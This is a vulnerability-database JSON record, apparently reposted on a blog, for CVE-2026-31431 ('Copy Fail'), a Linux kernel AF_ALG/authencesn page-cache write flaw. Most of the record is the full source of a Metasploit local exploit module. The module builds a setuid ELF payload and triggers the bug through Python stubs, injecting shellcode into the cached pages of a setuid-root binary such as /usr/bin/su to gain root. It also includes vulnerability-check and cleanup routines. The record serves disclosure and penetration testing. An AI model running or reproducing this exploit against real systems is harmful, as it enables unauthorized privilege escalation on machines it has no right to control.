{“lastseen”:”2026-05-01T19:28:02″,”description”:”CVE-2026-31431 is a logic flaw in the Linux kernel’s authencesn AEAD template that, when reached via the AFALG socket interface combined with splice, allows an unprivileged local user to perform a controlled 4-byte write into the page cache of any…”,”published”:”2026-05-01T19:01:25″,”modified”:”2026-05-01T19:01:25″,”type”:”metasploit”,”title”:”Copy Fail AF_ALG + authencesn Page-Cache Write”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-LOCAL-CVE_2026_31431_COPY_FAIL-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-31431″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Post::Architecture\\n include Msf::Post::Process\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Copy Fail AF_ALG + authencesn Page-Cache Write’,\\n ‘Description’ =\\u003e %q{\\n CVE-2026-31431 is a logic flaw in the Linux kernel’s authencesn AEAD template that, when reached via the\\n AF_ALG socket interface combined with splice(), allows an unprivileged local user to perform a controlled\\n 4-byte write into the page cache of any readable file. Because the corrupted pages are never marked dirty, the\\n on-disk file is unchanged but the in-memory version is immediately visible system-wide, enabling local\\n privilege escalation by injecting shellcode into the page cache of a setuid-root binary such as \/usr\/bin\/su.\\n The vulnerability was introduced by an in-place optimization in algif_aead.c (commit 72548b093ee3, 2017) and\\n affects essentially all major Linux distributions shipped since then until the fix in commit a664bf3d603d.\\n },\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-31431’],\\n [‘URL’, ‘https:\/\/copy.fail\/’],\\n [‘URL’, ‘https:\/\/github.com\/theori-io\/copy-fail-CVE-2026-31431\/blob\/main\/copy_fail_exp.py’],\\n [‘URL’, ‘https:\/\/github.com\/rootsecdev\/cve_2026_31431’]\\n ],\\n ‘Author’ =\\u003e [\\n ‘Xint Code’,\\n ‘rootsecdev’, # cleanup technique and additional PoC\\n ‘Spencer McIntyre’, # metasploit module\\n ‘Diego Ledda’ # metasploit module\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2026-04-29’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘SessionTypes’ =\\u003e [‘shell’, ‘meterpreter’],\\n ‘Targets’ =\\u003e [\\n [\\n # the payload is a linux command but the target must be a supported architecture (have an exec payload and\\n # PrependSetuid support)\\n ‘Linux Command’,\\n {\\n ‘Platform’ =\\u003e [‘linux’, ‘unix’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n # Space is constrained due to the max size of the resulting ELF executable (2024 on 6.8.0-79-generic\\n # x86_64, 2036 on 6.6.63-v8+ aarch64) if Metasploit changes the ELF executable size in the future, this\\n # may need to be updated\\n ‘Payload’ =\\u003e { ‘Space’ =\\u003e 1847, ‘DisableNops’ =\\u003e true }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘AKA’ =\\u003e [‘Copy Fail’],\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e []\\n }\\n )\\n )\\n end\\n\\n def check\\n stub_source = File.read(File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2026-31431’, ‘CVE-2026-31431-check.py’))\\n begin\\n output = run_python_stub(stub_source)\\n rescue Msf::Exploit::Failed =\\u003e e\\n return CheckCode::Unknown(\\”The exploit check failed: #{e}\\”)\\n end\\n\\n last_error = nil\\n output.split(\\”\\\\n\\”).each do |line|\\n if line.start_with?(‘[-] ‘)\\n print_error(last_error) if last_error\\n last_error = line[4…]\\n elsif line.start_with?(‘[+] ‘)\\n print_good(line[4…])\\n elsif line.start_with?(‘[*] ‘)\\n print_status(line[4…])\\n else\\n print_line(line)\\n end\\n end\\n\\n return CheckCode::Safe(last_error) if last_error\\n\\n begin\\n result = run_command(‘id’)\\n rescue Msf::Exploit::Failed =\\u003e e\\n return CheckCode::Unknown(\\”The exploit check failed: #{e}\\”)\\n end\\n\\n return CheckCode::Vulnerable if result =~ \/uid=0(\\\\(\\\\w+\\\\))?\/\\n\\n CheckCode::Safe(‘The target system is not exploitable.’)\\n end\\n\\n def find_exec_program\\n %w[python python3 python2].select(\\u0026method(:command_exists?)).first\\n end\\n\\n def exploit\\n run_command(payload.encoded)\\n end\\n\\n def run_python_stub(stub_source, *args)\\n python_binary = @python_binary || find_exec_program\\n fail_with(Failure::NotFound, ‘The python binary was not found.’) unless python_binary\\n\\n if @python_binary.nil?\\n vprint_status(\\”Using ‘#{python_binary}’ on the remote target.\\”)\\n @python_binary = python_binary\\n end\\n\\n stub = Msf::Payload::Python.create_exec_stub(stub_source)\\n\\n create_process(\\n ‘\/bin\/sh’,\\n args: [‘-c’, \\”echo #{Shellwords.escape(stub)} | exec #{python_binary} – \\\\\\”$@\\\\\\”\\”, ‘-‘] + args\\n )\\n end\\n\\n def run_command(os_command)\\n os_architecture = get_os_architecture\\n\\n unless [ ARCH_X64, ARCH_AARCH64 ].include?(os_architecture)\\n # this is an artificial filter for MVP while the details for the other architectures are worked out and tested.\\n fail_with(Failure::NoTarget, \\”#{os_architecture} targets are not supported.\\”)\\n end\\n\\n cmd_payload = framework.payloads.create(\\”linux\/#{os_architecture}\/exec\\”)\\n fail_with(Failure::NoTarget, \\”#{os_architecture} targets are not supported.\\”) if cmd_payload.nil? || !cmd_payload.options.key?(‘PrependSetuid’)\\n\\n cmd_payload.datastore[‘CMD’] = os_command\\n cmd_payload.datastore[‘PrependSetuid’] = true\\n elf = cmd_payload.generate_simple(‘Format’ =\\u003e ‘elf’)\\n\\n # this is useful for determining the max size that can be written by the exploit\\n vprint_status(\\”Generated a #{elf.size} byte ELF executable…\\”)\\n\\n print_status(‘Triggering the vulnerability using Python…’)\\n stub_source = File.read(File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2026-31431’, ‘CVE-2026-31431.py’))\\n run_python_stub(stub_source, ::Base64.strict_encode64(Zlib::Deflate.deflate(elf)))\\n end\\n\\n def cleanup\\n # cleanup technique to restore su to the original behavior courtesy of\\n # https:\/\/github.com\/rootsecdev\/cve_2026_31431\/blob\/f288952034d0d1b21c035d178c7a485dcf6a3618\/exploit_cve_2026_31431.py#L183-L187\\n stub_source = File.read(File.join(Msf::Config.data_directory, ‘exploits’, ‘CVE-2026-31431’, ‘CVE-2026-31431-cleanup.py’))\\n run_python_stub(stub_source)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/local\/cve_2026_31431_copy_fail.rb”,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/local\/cve_2026_31431_copy_fail\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-01T19:28:02″,”description”:”CVE-2026-31431 is a logic flaw in the Linux kernel’s authencesn AEAD template that, when reached via the AFALG socket interface combined with splice, allows an…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,169,13,7,11,5],"class_list":["post-50773","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n